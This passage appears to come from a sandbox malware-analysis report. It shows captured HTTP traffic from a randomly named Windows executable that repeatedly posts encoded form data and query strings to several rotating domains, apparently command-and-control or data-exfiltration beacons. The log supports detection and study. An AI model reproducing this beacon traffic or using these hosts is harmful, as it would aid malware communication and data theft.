                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.666141987 CEST1236INData Raw: 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65
                                                                                                                                                                                                                                              Data Ascii: reset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49993 | 118.139.178.37 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:22.009376049 CEST | 1777 | OUT | POST /o55g/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.coba168.info
Origin: http://www.coba168.info
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1242
Referer: http://www.coba168.info/o55g/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:18:23.198098898 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Thu, 24 Oct 2024 13:18:22 GMT
Server: Apache
X-Powered-By: PHP/8.2.23
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49994 | 118.139.178.37 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:24.558223963 CEST | 482 | OUT | GET /o55g/?7Bohe=SntAYgquUuF8cmTqKgeHt96czNjKbI7walrzfjn5MBbpbz0DMUAQT5TGmaCmCOcjM4ET7TOvVUXTFF/O6lHSx5C+s9iWJ/mgfg63citE2SV2GP/8IEdknZeeY7ynAeJL4g==&vD=h0e85v HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.coba168.info
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:18:25.763803959 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Thu, 24 Oct 2024 13:18:25 GMT
Server: Apache
X-Powered-By: PHP/8.2.23
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49995 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:31.500427961 CEST | 743 | OUT | POST /kb53/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.everyone.golf
Origin: http://www.everyone.golf
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
Referer: http://www.everyone.golf/kb53/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49996 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:34.042968035 CEST | 763 | OUT | POST /kb53/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.everyone.golf
Origin: http://www.everyone.golf
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Referer: http://www.everyone.golf/kb53/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49997 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:36.592191935 CEST | 1780 | OUT | POST /kb53/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.everyone.golf
Origin: http://www.everyone.golf
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1242
Referer: http://www.everyone.golf/kb53/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49998 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:39.130636930 CEST | 483 | OUT | GET /kb53/?7Bohe=1b0Bx/9NiZhb6KmmoJd23RBorG5xllzN0i8gdStRuw/8VfKYv2Om9x/jS97CLdhlzFEmDVkAPiLAZwnB3Rwit6hYzhYwWiv4x0tew8h6s38ig+exADmGM0H8mBfgPTkFYw==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.everyone.golf
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:18:39.753602982 CEST | 403 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:39 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7Bohe=1b0Bx/9NiZhb6KmmoJd23RBorG5xllzN0i8gdStRuw/8VfKYv2Om9x/jS97CLdhlzFEmDVkAPiLAZwnB3Rwit6hYzhYwWiv4x0tew8h6s38ig+exADmGM0H8mBfgPTkFYw==&vD=h0e85v"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49999 | 209.74.64.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:44.830508947 CEST | 746 | OUT | POST /elh0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.royapop.online
                                                                                                                                                                                                                                              Origin: http://www.royapop.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.royapop.online/elh0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=kxtfltxEbVG30t/4UXowoTalbVey+Iolsiy5V+QXVYnJxmurcKnzXlRmCxiAGE3JtZ7XxFEMtnI18ZEDeoeldWjA7iRF8jzC5rc3CWmBMuGSZ2veuUY5j2J2pGXYb+cL45EsV2Qjwf4nRdrr+1pwvI+CADJcoreeckhn+qXHgD7iUwb7uUBrygGjGaW/3pKoLiJkPVQ=
Oct 24, 2024 15:18:45.495470047 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:45 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 50000 | 209.74.64.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:47.372359037 CEST | 766 | OUT | POST /elh0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.royapop.online
                                                                                                                                                                                                                                              Origin: http://www.royapop.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.royapop.online/elh0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=kxtfltxEbVG3y9P4YUQw5DbXU1ey0opisiO5V/UHVLDJxDSrdLnzSlRmaBiBbU34tZ3hxHQMtnM18bMDefKkbGjCzCRb4jzC5rc3CWCvMueSZF3ev2g2uWJ5qGXYf+cH45F7VyYZwZ0nRc7r/h93mI+IOjISrojgGnZO1cGz+gblVG2R02JDhAqbWJeImZrBRBZURCHMIbIjKmRR2ZDWC8TzYIqP
Oct 24, 2024 15:18:48.036823034 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:47 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 50001 | 209.74.64.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:49.917623997 CEST | 1783 | OUT | POST /elh0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.royapop.online
                                                                                                                                                                                                                                              Origin: http://www.royapop.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.royapop.online/elh0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:50.580857038 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:50 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 50002 | 209.74.64.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:52.464195013 CEST | 484 | OUT | GET /elh0/?7Bohe=pzF/mZhnV0GSmLX+GycMwU6WT06CzqVGvQudBfY4Dqjs/3KtcpfJYGVadgWONk/4osLjzgZwgHUQ0ZwKAvTdTnbY8Qd/xTrHuaQfE1OzRfvOWlfeun0LuB51rXnhStJusg==&vD=h0e85v HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.royapop.online
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:18:53.154932976 CEST | 548 | IN | HTTP/1.1 404 Not Found
Date: Thu, 24 Oct 2024 13:18:53 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 50003 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:06.576262951 CEST | 734 | OUT | POST /deo6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.b-ambu.com
Origin: http://www.b-ambu.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
Referer: http://www.b-ambu.com/deo6/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: 7Bohe=ADahBgujTecs0pgIFLFmaCM0pVHr8LwgKsfYt3Zld9v9FEX3Q2sIkho7O60HhXNYVmUAxKwVsWJrs8Z+zN84kzrSxawqD6ZTdSYp8T+uTODX8vSQnMvmw6Z0KBjhXJYGLCyXNgGqL/lHRtH9Bmj+rbdbiXZAX4Lih8Me0JWiyO7TMQm2NMGnwGKr5Q4rFgD+IkNtfA0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 50004 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:09.124147892 CEST | 754 | OUT | POST /deo6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.b-ambu.com
Origin: http://www.b-ambu.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Referer: http://www.b-ambu.com/deo6/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: 7Bohe=ADahBgujTecsm4QIJMxmdiM1n1Hr1rwkKsTYty46cPL9LBT3R0EInho7WK0Gr3NHVmI5xI0VsSprs59+z9A7rDrQ66woOaZTdSYp8TaETO7X9buQ2ZDn9aZzDhjhdpYCLCy5NhaAL9dHRtX9A0L9hbdZmXYBXJKlvNorzpj+ud7QJmLcXuOPjmmTpDwcUQiXSHddBXgsITBV5x/Uh0dXLCbAQViu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 50005 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:11.667177916 CEST | 1771 | OUT | POST /deo6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.b-ambu.com
Origin: http://www.b-ambu.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1242
Referer: http://www.b-ambu.com/deo6/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: 7Bohe= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 50006 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:14.209057093 CEST | 480 | OUT | GET /deo6/?7Bohe=NByBCVC4fvk3zNlObrJyagJtuzfI3YQ4Ad7pkV0ATPDcP1/VdlZwhks7LZ4Zlk95UTsGsfg9gVB7u8RemM4hoUvK2Ig2OY9rZRI88AWKe5yd8pSEv6a6wulMHxqZW9lecA==&vD=h0e85v HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.b-ambu.com
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:19:15.027726889 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: hcdn
Date: Thu, 24 Oct 2024 13:19:14 GMT
Content-Type: text/html
Content-Length: 10072
Connection: close
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: d663c1a22614092b0ff660635fddd455-int-edge3
Expires: Thu, 24 Oct 2024 13:19:13 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 50007 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:20.224915981 CEST | 761 | OUT | POST /r966/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.livpure-grab.online
                                                                                                                                                                                                                                              Origin: http://www.livpure-grab.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.livpure-grab.online/r966/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=fvcTNRjB45fmeWWncdCQpZMfnwWfYFf2kEEnu06+5zYVUeyvsuqOSIys66t3N8vgUWujqHawMGH5H421tKrOaO43qYqkiUd1cLQZDxc4Z7cQy0MQP2gF0zKrFqkyyaU5HWOEfoj5jA0vr6O2I/TjB8JbF6I2eZ4CoLD/kA+UmqBTvwkBP2KBfUF7aK8jbYU2HcPfcMo=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50008 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:22.776475906 CEST | 781 | OUT | POST /r966/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.livpure-grab.online
                                                                                                                                                                                                                                              Origin: http://www.livpure-grab.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.livpure-grab.online/r966/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=fvcTNRjB45fmc2GnP8CQs5McoQWfXlfykEInuxDj5h8VX/Cv+/qOTIys9KtuCcvpUWqNqGKwMGT5H6u1t6XJbe4p2Yqm/kd1cLQZDxYSZ7UQyEcQOV4G3zLZCqky46U9HWOifqXfjEEvr/K2LrngYMJRPaJZZpdmhZ3AkAjHzLp3nmJrVUCpM0pDKZ0UKo1fd/fvCb9lfcf3NcOib00nbLH+aWGI


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50009 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:25.327523947 CEST | 1798 | OUT | POST /r966/ HTTP/1.1
